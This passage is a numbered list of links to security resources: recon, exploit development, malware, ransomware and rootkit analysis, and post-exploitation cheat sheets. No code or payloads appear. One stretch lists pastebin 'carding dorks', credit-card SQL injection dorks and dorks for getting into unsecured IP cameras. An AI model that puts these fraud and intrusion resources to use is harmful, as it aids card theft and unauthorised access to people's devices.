tips to make the most of Twitter as a pentester or bug bounty hunter:\n\n\nhttps://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html\n\n\n-1060-A Guide To Subdomain Takeovers:\n\n\nhttps://www.hackerone.com/blog/Guide-Subdomain-Takeovers\n\n\n-1061-Advanced Recon Automation (Subdomains) case 1:\n\n\nhttps://medium.com/p/9ffc4baebf70\n\n\n-1062-Security testing for REST API with w3af:\n\n\nhttps://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------\n\n\n\n-1062-The Lazy Hacker:\n\n\nhttps://securit.ie/blog/?p=86\n\n\n-1063-Practical recon techniques for bug hunters & pen testers:\n\n\nhttps://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md\n\n\n\n-1064-A More Advanced Recon Automation #1 (Subdomains):\n\n\nhttps://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/\n\n\n\n-1065-Expanding your scope (Recon automation #2):\n\n\n\nhttps://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/\n\n\n\n-1066-RCE by uploading a web.config:\n\n\n\nhttps://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/\n\n\n\n-1067-Finding and exploiting Blind XSS:\n\n\nhttps://enciphers.com/finding-and-exploiting-blind-xss/\n\n\n\n-1068-Google dorks list 2018:\n\n\nhttp://conzu.de/en/google-dork-liste-2018-conzu\n\n\n-1096-Out of Band Exploitation (OOB) CheatSheet:\n\n\nhttps://www.notsosecure.com/oob-exploitation-cheatsheet/\n\n\n-1070-Metasploit Cheat Sheet:\n\n\nhttps://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/\n\n\n\n\n-1071-Linux Post Exploitation Cheat Sheet :\n\n\n\nred-orbita.com/?p=8455\n\n\n\n\n\n-1072-OSCP/Pen Testing Resources :\n\n\nhttps://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45\n\n\n\n-1073-Out Of Band Exploitation (OOB) CheatSheet :\n\n\nhttps://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html\n\n\n\n\n-1074-HTML5 Security Cheatsheet:\n\n\nhttps://html5sec.org/\n\n\n\n-1075-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/\n\n\n\n\n-1076-Responder - CheatSheet:\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1076-Windows Post-Exploitation Command List:\n\n\n\npentest.tonyng.net/windows-post-exploitation-command-list/\n\n\n\n\n-1077-Transfer files (Post explotation) - CheatSheet\n\n\n\nhttps://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/\n\n\n\n-1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity:\n\n\n\nhttps://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/\n\n\n\n-1079-OSCP useful resources and tools:\n\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n\n-1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet:\n\n\nwww.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet\n\n\n\n-1081-Transferring files from Kali to Windows (post exploitation) :\n\n\n\nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/\n\n\n\n-1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit:\n\n\n\nhttps://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f...\n\n\n\n\n-1083-OSCP Goldmine (not clickbait):\n\n\n\n0xc0ffee.io/blog/OSCP-Goldmine\n\n\n\n-1084-Privilege escalation: Linux :\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux\n\n\n\n\n-1085-Exploitation Tools Archives :\n\n\n\nhttps://pentesttools.net/category/exploitationtools/\n\n\n\n-1086-From Local File Inclusion to Remote Code Execution - Part 1:\n\n\n\nhttps://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1\n\n\n\n\n-1087-Basic Linux Privilege Escalation:\n\n\n\nhttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/\n\n\n\n-1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet:\n\n\n\nwww.vulnerability-lab.com/resources/documents/587.txt\n\n\n\n-1089-Binary Exploitation:\n\n\n\nhttps://pwndevils.com/hacking/howtwohack.html\n\n\n\n\n1090-A guide to Linux Privilege Escalation:\n\n\nhttps://payatu.com/guide-linux-privilege-escalation/\n\n\n\n-1091-Penetration Testing Tools Cheat Sheet :\n\n\n\nhttps://news.ycombinator.com/item?id=11977304\n\n\n\n\n-1092-List of Metasploit Commands - Cheatsheet:\n\n\n\nhttps://thehacktoday.com/metasploit-commands/\n\n\n\n-1093-A journey into Radare 2 – Part 2: Exploitation:\n\n\n\nhttps://www.megabeets.net/a-journey-into-radare-2-part-2/\n\n\n\n-1094-Remote Code Evaluation (Execution) Vulnerability:\n\n\n\nhttps://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/\n\n\n\n-1095-Exploiting Python Code Injection in Web Applications:\n\n\n\nhttps://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat...\n\n\n\n\n-1096-Shells · Total OSCP Guide:\n\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html\n\n\n\n-1097-MongoDB Injection cheat sheet Archives:\n\n\n\nhttps://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/\n\n\n\n-1098-Basic Shellshock Exploitation:\n\n\n\nhttps://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/\n\n\n\n-1099-Wireshark Tutorial and Tactical Cheat Sheet :\n\n\nhttps://hackertarget.com/wireshark-tutorial-and-cheat-sheet/\n\n\n\n-1100-Windows Command Line cheatsheet (part 2):\n\n\nhttps://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm...\n\n\n\n-1101-Detecting WMI exploitation:\n\n\n\nwww.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation...\n\n\n\n1102-Metasploit Cheat Sheet - Hacking Land :\n\n\n\nhttps://www.hacking.land/2019/02/metasploit-cheat-sheet.html\n\n\n\n\n-1103-5 Practical Scenarios for XSS Attacks:\n\n\n\nhttps://pentest-tools.com/blog/xss-attacks-practical-scenarios/\n\n\n\n-1104-Ultimate gdb cheat sheet:\n\n\n\nhttp://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/\n\n\n\n-1105-Reverse Engineering Cheat Sheet:\n\n\nhttps://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet\n\n\n\n-1106-Reverse Engineering Cheat Sheet:\n\n\n\nhttps://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet\n\n\n\n-1107-Reverse Engineering For Malware Analysis:\n\n\n\nhttps://eforensicsmag.com/reverse_engi_cheatsheet/\n\n\n\n\n-1108-Reverse-engineering Cheat Sheets :\n\n\n\nhttps://www.cheatography.com/tag/reverse-engineering/\n\n\n\n-1109-Shortcuts for Understanding Malicious Scripts:\n\n\n\nhttps://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross\n\n\n\n\n\n-1110-WinDbg Malware Analysis Cheat Sheet :\n\n\n\nhttps://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/\n\n\n\n\n-1111-Cheat Sheet for Malware Analysis:\n\n\n\n\nhttps://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/\n\n\n\n\n-1112-Tips for Reverse-Engineering Malicious Code :\n\n\n\nhttps://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet\n\n\n\n-1113-Cheatsheet for radare2 :\n\n\n\nhttps://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html\n\n\n\n\n\n-1114-Reverse Engineering Cheat Sheets:\n\n\n\n\nhttps://www.pinterest.com/pin/576390452300827323/\n\n\n\n\n-1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links:\n\n\n\nhttps://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed\n\n\n\n\n\n-1116-Malware Resources :\n\n\n\nhttps://www.professor.bike/malware-resources\n\n\n\n-1117-Zero-day exploits: A cheat sheet for professionals:\n\n\nhttps://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/\n\n\n\n-1118-Getting cozy with exploit development:\n\n\n\nhttps://0x00sec.org/t/getting-cozy-with-exploit-development/5311\n\n\n\n\n\n-1119-appsec - Web Security Cheatsheet :\n\n\nhttps://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list\n\n\n\n\n-1120-PEDA - Python Exploit Development Assistance For GDB:\n\n\n\nhttps://www.pinterest.ru/pin/789044797190775841/\n\n\n\n-1121-Exploit Development Introduction (part 1) :\n\n\n\nhttps://www.cybrary.it/video/exploit-development-introduction-part-1/\n\n\n\n-1122-Windows Exploit Development: A simple buffer overflow example:\n\n\nhttps://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a\n\n\n\n\n-1123-Exploit Development-Everything You Need to Know:\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/\n\n\n\n-1124-Exploit Development :\n\n\nhttps://0x00sec.org/c/exploit-development\n\n\n\n-1125-Exploit Development - Infosec Resources:\n\n\n\nhttps://resources.infosecinstitute.com/category/exploit-development/\n\n\n\n-1126-Exploit Development :\n\n\n\nhttps://www.reddit.com/r/ExploitDev/\n\n\n\n-1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept :\n\n\n\nhttps://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept\n\n\n\n-1128-Exploit Development for Beginners:\n\n\nhttps://www.youtube.com/watch?v=tVDuuz60KKc\n\n\n\n-1129-Introduction to Exploit Development:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/expDev/1.html\n\n\n\n-1130-Exploit Development And Reverse Engineering:\n\n\n\nhttps://www.immunitysec.com/services/exploit-dev-reverse-engineering.html\n\n\n\n-1131-wireless forensics:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023\n\n\n\n-1132-fake AP Detection:\n\n\nhttps://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866\n\n\n\n-1133-In-Depth analysis of SamSam Ransomware:\n\n\nhttps://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/\n\n\n\n-1134-WannaCry ransomware:\n\n\nhttps://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis\n\n\n\n-1135-malware analysis:\n\n\nhttps://www.sans.org/reading-room/whitepapers/malicious/paper/2103\n\n\n\n-1136-Metasploit's detailed communication and protocol writeup:\n\n\nhttps://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf\n\n\n\n-1137-Metasploit's SSL-generation module::\n\n\n\nhttps://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb\n\n\n\n-1139-Empire IOCs::\n\n\nhttps://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315\n\n\n\n-1140-excellent free training on glow analysis:\n\n\nhttp://opensecuritytraining.info/Flow.html\n\n\n-1141-NetFlow using Silk:\n\n\nhttps://tools.netsa.cert.org/silk/analysis-handbook.pdf\n\n\n\n-1142-Deep Packet Inspection:\n\n\nhttps://is.muni.cz/th/ql57c/dp-svoboda.pdf\n\n\n\n-1143-Detecting Behavioral Personas with OSINT and Datasploit:\n\n\nhttps://www.exploit-db.com/docs/45543\n\n\n\n-1144-WordPress Penetration Testing using WPScan and MetaSploit:\n\n\nhttps://www.exploit-db.com/docs/45556\n\n\n\n-1145-Bulk SQL Injection using Burp-to-SQLMap:\n\n\n\nhttps://www.exploit-db.com/docs/45428\n\n\n\n\n-1146-XML External Entity Injection - Explanation and Exploitation:\n\n\n\nhttps://www.exploit-db.com/docs/45374\n\n\n\n\n-1147-\tWeb Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3):\n\n\n\nhttps://www.exploit-db.com/docs/45368\n\n\n\n-1148-File Upload Restrictions Bypass:\n\n\nhttps://www.exploit-db.com/docs/45074\n\n\n\n-1149-VLAN Hopping Attack:\n\n\nhttps://www.exploit-db.com/docs/45050\n\n\n\n\n-1150-Jigsaw Ransomware Analysis using Volatility:\n\n\nhttps://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9\n\n\n\n-1151-Ransomware early detection by the analysis of file sharing traffic:\n\n\n\nhttps://www.sciencedirect.com/science/article/pii/S108480451830300X\n\n\n\n\n-1152-Do You Think You Can Analyse Ransomware?:\n\n\n\nhttps://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529\n\n\n\n\n-1153-Analysis of LockerGoga Ransomware :\n\n\n\nhttps://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/\n\n\n\n\n-1154-Detection and Forensic Analysis of Ransomware Attacks :\n\n\n\nhttps://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf\n\n\n\n\n-1155-Bad Rabbit Ransomware Technical Analysis:\n\n\nhttps://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/\n\n\n\n\n-1156-NotPetya Ransomware analysis :\n\n\nhttps://safe-cyberdefense.com/notpetya-ransomware-analysis/\n\n\n\n-1157-Identifying WannaCry on Your Server Using Logs:\n\n\n\nhttps://www.loggly.com/blog/identifying-wannacry-server-using-logs/\n\n\n\n\n-1158-The past, present, and future of ransomware:\n\n\nhttps://www.itproportal.com/features/the-past-present-and-future-of-ransomware/\n\n\n\n\n-1159-The dynamic analysis of WannaCry ransomware :\n\n\n\nhttps://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf\n\n\n\n-1160-Malware Analysis: Ransomware - SlideShare:\n\n\n\nhttps://www.slideshare.net/davidepiccardi/malware-analysis-ransomware\n\n\n\n\n-1161-Article: Anatomy of ransomware malware: detection, analysis :\n\n\nhttps://www.inderscience.com/info/inarticle.php?artid=84399\n\n\n\n-1162-Tracking desktop ransomware payments :\n\n\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf\n\n\n\n\n-1163-What is Ransomware? Defined, Explained, and Explored:\n\n\n\nhttps://www.forcepoint.com/cyber-edu/ransomware\n\n\n\n-1164-Detect and Recover from Ransomware Attacks:\n\n\nhttps://www.indexengines.com/ransomware\n\n\n\n\n-1165-Wingbird rootkit analysis:\n\n\nhttps://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html\n\n\n\n-1166-Windows Kernel Rootkits: Techniques and Analysis:\n\n\nhttps://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html\n\n\n\n-1167-Rootkit: What is a Rootkit and How to Detect It :\n\n\n\nhttps://www.veracode.com/security/rootkit\n\n\n\n-1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis:\n\n\n\nhttps://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/\n\n\n\n-1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2:\n\n\n\nhttps://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/\n\n\n\n\n-1170-ZeroAccess – an advanced kernel mode rootkit :\n\n\n\nhttps://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf\n\n\n\n-1171-Rootkit Analysis Identification Elimination:\n\n\n\nhttps://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination\n\n\n\n\n\n-1172-TDL3: The Rootkit of All Evil?:\n\n\n\nstatic1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf\n\n\n\n\n-1173-Avatar Rootkit: Dropper Analysis:\n\n\n\nhttps://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/\n\n\n\n-1174-Sality rootkit analysis:\n\n\n\nhttps://www.prodefence.org/sality-rootkit-analysis/\n\n\n\n\n-1175-RootKit Hook Analyzer:\n\n\nhttps://www.resplendence.com/hookanalyzer/\n\n\n\n\n-1176-Behavioral Analysis of Rootkit Malware:\n\n\n\nhttps://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/\n\n\n\n\n-1177-Malware Memory Analysis of the IVYL Linux Rootkit:\n\n\n\nhttps://apps.dtic.mil/docs/citations/AD1004349\n\n\n\n\n-1178-Analysis of the KNARK rootkit :\n\n\nhttps://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit\n\n\n\n\n-1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim :\n\n\n\nhttps://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1\n\n\n\n-1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques:\n\n\n\nhttps://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\n\n\n\n-1181-Code & Process Injection - Red Teaming Experiments:\n\n\n\nhttps://ired.team/offensive-security/code-injection-process-injection\n\n\n\n\n-1182-What Malware Authors Don't want you to know:\n\n\n\nhttps://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know\n\n\n\n\n-1183-.NET Process Injection:\n\n\n\nhttps://medium.com/@malcomvetter/net-process-injection-1a1af00359bc\n\n\n\n-1184-Memory Injection like a Boss :\n\n\n\nhttps://www.countercept.com/blog/memory-injection-like-a-boss/\n\n\n\n\n-1185-Process injection - Malware style:\n\n\n\nhttps://www.slideshare.net/demeester1/process-injection\n\n\n\n-1186-Userland API Monitoring and Code Injection Detection:\n\n\n\nhttps://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565\n\n\n\n\n-1187-Unpacking Redaman Malware & Basics of Self-Injection Packers:\n\n\n\nhttps://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/\n\n\n\n\n-1188-Code injection on macOS:\n\n\n\nhttps://knight.sc/malware/2019/03/15/code-injection-on-macos.html\n\n\n\n-1189-(Shell)Code Injection In Linux Userland :\n\n\n\nhttps://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md\n\n\n\n\n-1190-Code injection on Windows using Python:\n\n\n\nhttps://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/\n\n\n\n\n-1191-What is Reflective DLL Injection and how can be detected?:\n\n\n\nhttps://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/\n\n\n\n\n-1192-Windows Process Injection:\n\n\n\nhttps://modexp.wordpress.com/2018/08/23/process-injection-propagate/\n\n\n\n-1193-A+ cheat sheet:\n\n\n\nhttps://www.slideshare.net/abnmi/a-cheat-sheet\n\n\n-1194-A Bettercap Tutorial — From Installation to Mischief:\n\n\nhttps://danielmiessler.com/study/bettercap/\n\n\n\n\n-1195-Debugging Malware with WinDbg:\n\n\n\nhttps://www.ixiacom.com/company/blog/debugging-malware-windbg\n\n\n\n\n-1195-Malware analysis, my own list of tools and resources:\n\n\n\nhttps://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/\n\n\n\n-1196-Getting Started with Reverse Engineering:\n\n\nhttps://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html\n\n\n\n-1197-Debugging malicious windows scriptlets with Google chrome:\n\n\n\nhttps://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c\n\n\n\n-1198-Intro to Radare2 for Malware Analysis:\n\n\n\nhttps://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/\n\n\n\n\n-1199-Intro to Malware Analysis and Reverse Engineering:\n\n\n\nhttps://www.cybrary.it/course/malware-analysis/\n\n\n\n-1200-Common Malware Persistence Mechanisms:\n\n\nhttps://resources.infosecinstitute.com/common-malware-persistence-mechanisms/\n\n\n\n-1201-Finding Registry Malware Persistence with RECmd:\n\n\n\nhttps://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd\n\n\n\n-1202-Windows Malware Persistence Mechanisms :\n\n\nhttps://www.swordshield.com/blog/windows-malware-persistence-mechanisms/\n\n\n\n-1203- persistence techniques:\n\n\n\nhttps://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/\n\n\n\n-1204- Persistence Mechanism - an overview | ScienceDirect Topics:\n\n\nhttps://www.sciencedirect.com/topics/computer-science/persistence-mechanism\n\n\n\n-1205-Malware analysis for Linux:\n\n\nhttps://www.sothis.tech/en/malware-analysis-for-linux-wirenet/\n\n\n\n-1206-Linux Malware Persistence with Cron:\n\n\nhttps://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/\n\n\n\n-1207-What is advanced persistent threat (APT)? :\n\n\n\nhttps://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT\n\n\n\n-1208-Malware Analysis, Part 1: Understanding Code Obfuscation :\n\n\nhttps://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/\n\n\n\n-1209-Top 6 Advanced Obfuscation Techniques:\n\n\n\nhttps://sensorstechforum.com/advanced-obfuscation-techniques-malware/\n\n\n\n-1210-Malware Obfuscation Techniques:\n\n\n\nhttps://dl.acm.org/citation.cfm?id=1908903\n\n\n\n-1211-How Hackers Hide Their Malware: Advanced Obfuscation:\n\n\n\nhttps://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723\n\n\n\n\n-1212-Malware obfuscation techniques: four simple examples:\n\n\n\nhttps://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/\n\n\n\n-1213-Malware Monday: Obfuscation:\n\n\nhttps://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0\n\n\n\n-1213-Challenge of Malware Analysis: Malware obfuscation Techniques:\n\n\n\nhttps://www.ijiss.org/ijiss/index.php/ijiss/article/view/327\n\n\n\n\n-1214-Static Malware Analysis - Infosec Resources:\n\n\n\nhttps://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/\n\n\n\n\n-1215-Malware Basic Static Analysis:\n\n\n\nhttps://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725\n\n\n\n-1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis:\n\n\n\nhttp://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/\n\n\n\n\n-1217-What is Malware Analysis | Different Tools for Malware Analysis:\n\n\n\nhttps://blog.comodo.com/different-techniques-for-malware-analysis/\n\n\n\n-1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning:\n\n\n\nhttps://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/\n\n\n\n\n-1219-Limits of Static Analysis for Malware Detection:\n\n\n\nhttps://ieeexplore.ieee.org/document/4413008\n\n\n\n-1220-Kernel mode versus user mode:\n\n\nhttps://blog.codinghorror.com/understanding-user-and-kernel-mode/\n\n\n\n-1221-Understanding the ELF:\n\n\nhttps://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571\n\n\n\n-1222-Windows Privilege Abuse: Auditing, Detection, and Defense:\n\n\n\nhttps://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e\n\n\n\n-1223-First steps to volatile memory analysis:\n\n\n\nhttps://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1\n\n\n-1224-Maliciously Mobile: A Brief History of Mobile Malware:\n\n\n\nhttps://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8\n\n\n\n\n-1225-Modern Binary Exploitation Writeups 0x01:\n\n\n\nhttps://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4\n\n\n-1226-Exploit Development 01 — Terminology:\n\n\n\nhttps://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5\n\n\n\n-1227-Zero-day exploits: A cheat sheet for professionals:\n\n\nhttps://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/\n\n\n-1228-Best google hacking list on the net:\n\n\nhttps://pastebin.com/x5LVJu9T\n\n\n\n-1229-Google Hacking:\n\n\nhttps://pastebin.com/6nsVK5Xi\n\n\n\n-1230-OSCP links:\n\n\nhttps://pastebin.com/AiYV80uQ\n\n\n\n\n-1231-Pentesting 1 Information gathering:\n\n\n\nhttps://pastebin.com/qLitw9eT\n\n\n\n\n-1232-OSCP-Survival-Guide:\n\n\nhttps://pastebin.com/kdc6th08\n\n\n\n-1233-Googledork:\n\n\nhttps://pastebin.com/qKwU37BK\n\n\n\n\n-1234-Exploit DB:\n\n\n\nhttps://pastebin.com/De4DNNKK\n\n\n\n-1235-Dorks:\n\n\n\nhttps://pastebin.com/cfVcqknA\n\n\n\n-1236-GOOGLE HACKİNG DATABASE:\n\n\n\nhttps://pastebin.com/1ndqG7aq\n\n\n\n-1237-Carding Dorks 2019:\n\n\n\nhttps://pastebin.com/Hqsxu6Nn\n\n\n\n-1238-17k Carding Dorks 2019:\n\n\n\nhttps://pastebin.com/fgdZxy74\n\n\n\n\n\n-1239-CARDING DORKS 2019:\n\n\n\nhttps://pastebin.com/Y7KvzZqg\n\n\n\n\n-1240-sqli dork 2019:\n\n\nhttps://pastebin.com/8gdeLYvU\n\n\n\n\n-1241-Private Carding Dorks 2018:\n\n\n\nhttps://pastebin.com/F0KxkMMD\n\n\n\n-1242-20K dorks list fresh full carding 2018:\n\n\n\nhttps://pastebin.com/LgCh0NRJ\n\n\n\n\n-1243-8k Carding Dorks :):\n\n\n\nhttps://pastebin.com/2bjBPiEm\n\n\n\n\n-1244-8500 SQL DORKS:\n\n\n\nhttps://pastebin.com/yeREBFzp\n\n\n\n\n-1245-REAL CARDING DORKS:\n\n\n\nhttps://pastebin.com/0kMhA0Gb\n\n\n\n\n-1246-15k btc dorks:\n\n\n\nhttps://pastebin.com/zbbBXSfG\n\n\n\n\n-1247-Sqli dorks 2016-2017:\n\n\n\nhttps://pastebin.com/7TQiMj3A\n\n\n\n\n-1248-Here is kind of a tutorial on how to write google dorks.:\n\n\n\nhttps://pastebin.com/hZCXrAFK\n\n\n\n\n-1249-10k Private Fortnite Dorks:\n\n\n\nhttps://pastebin.com/SF9UmG1Y\n\n\n\n\n-1250-find login panel dorks:\n\n\n\nhttps://pastebin.com/9FGUPqZc\n\n\n\n\n\n\n-1251-Shell dorks:\n\n\n\n\nhttps://pastebin.com/iZBFQ5yp\n\n\n\n\n-1252-HQ PAID GAMING DORKS:\n\n\n\nhttps://pastebin.com/vNYnyW09\n\n\n\n\n-1253-10K HQ Shopping DORKS:\n\n\n\nhttps://pastebin.com/HTP6rAt4\n\n\n\n\n-1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold:\n\n\n\nhttps://pastebin.com/ttxAJbdW\n\n\n\n-1255-Gain access to unsecured IP cameras with these Google dorks:\n\n\n\n\nhttps://pastebin.com/93aPbwwE\n\n\n\n\n-1256-new fresh dorks:\n\n\n\nhttps://pastebin.com/ZjdxBbNB\n\n\n\n-1257-SQL DORKS FOR CC:\n\n\n\nhttps://pastebin.com/ZQTHwk2S\n\n\n\n\n-1258-Wordpress uploadify Dorks Priv8:\n\n\n\nhttps://pastebin.com/XAGmHVUr\n\n\n\n\n-1259-650 DORKS CC:\n\n\n\nhttps://pastebin.com/xZHARTyz\n\n\n\n\n-1260-3k Dorks Shopping:\n\n\n\nhttps://pastebin.com/e1XiNa8M\n\n\n\n\n\n-1261-DORKS 2018 :\n\n\n\nhttps://pastebin.com/YAZkPJ0j\n\n\n\n-1262-HQ FORTNITE DORKS LIST:\n\n\n\n\nhttps://pastebin.com/rzhiNad8\n\n\n\n\n-1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING:\n\n\n\nhttps://pastebin.com/VwVpAvj2\n\n\n\n\n-1264-Camera dorks:\n\n\n\nhttps://pastebin.com/fsARft2j\n\n\n\n\n-1265-Admin Login Dorks:\n\n\n\n\nhttps://pastebin.com/HWWNZCph\n\n\n\n\n-1266-sql gov dorks:\n\n\n\nhttps://pastebin.com/C8wqyNW8\n\n\n\n-1267-10k hq gaming dorks:\n\n\n\nhttps://pastebin.com/cDLN8edi\n\n\n\n\n-1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! :\n\n\n\n\nhttps://pastebin.com/y59kK2h0\n\n\n\n\n\n-1269-Dorks:\n\n\n\n\nhttps://pastebin.com/PKvZYMAa\n\n\n\n\n-1270-10k btc dorks:\n\n\n\nhttps://pastebin.com/vRnxvbCu\n\n\n\n\n-1271-7,000 Dorks for hacking into various sites:\n\n\n\nhttps://pastebin.com/n8JVQv3X\n\n\n\n-1272-List of information gathering search engines/tools etc:\n\n\nhttps://pastebin.com/GTX9X5tF\n\n\n\n-1273-FBOSINT:\n\n\n\nhttps://pastebin.com/5KqnFS0B\n\n\n\n-1274-Ultimate Penetration Testing:\n\n\n\nhttps://pastebin.com/4EEeEnXe\n\n\n\n-1275-massive list of information gathering search engines/tools :\n\n\n\nhttps://pastebin.com/GZ9TVxzh\n\n\n\n-1276-CEH Class:\n\n\n\nhttps://pastebin.com/JZdCHrN4\n\n\n\n-1277-CEH/CHFI Bundle Study Group 